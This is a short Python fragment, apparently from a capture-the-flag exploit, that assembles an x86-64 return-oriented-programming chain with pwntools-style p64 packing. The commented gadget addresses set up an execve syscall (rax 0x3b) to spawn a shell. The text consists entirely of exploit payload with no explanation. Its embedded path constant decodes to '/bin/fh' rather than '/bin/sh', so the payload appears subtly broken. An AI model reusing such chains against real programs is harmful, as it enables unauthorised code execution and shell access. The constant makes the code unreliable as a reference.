payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x47b030)+p64(0x422f84)
# 0x0000000000422f84: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x40c643)
# 0x000000000040c643: mov qword ptr [rdi + 0x40], rax; ret; 
payload += p64(0x422f84)
# 0x0000000000422f84: pop rax; ret; 
payload += p64(0x0)+p64(0x43c330)
# 0x000000000043c330: xchg eax, edx; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x47b070)+p64(0x423a1e)
# 0x0000000000423a1e: pop rsi; ret; 
payload += p64(0x0)+p64(0x422f84)
# 0x0000000000422f84: pop rax; ret; 
payload += p64(0x3b)+p64(0x428480)
# 0x0000000000428480: syscall; 
payload += b''
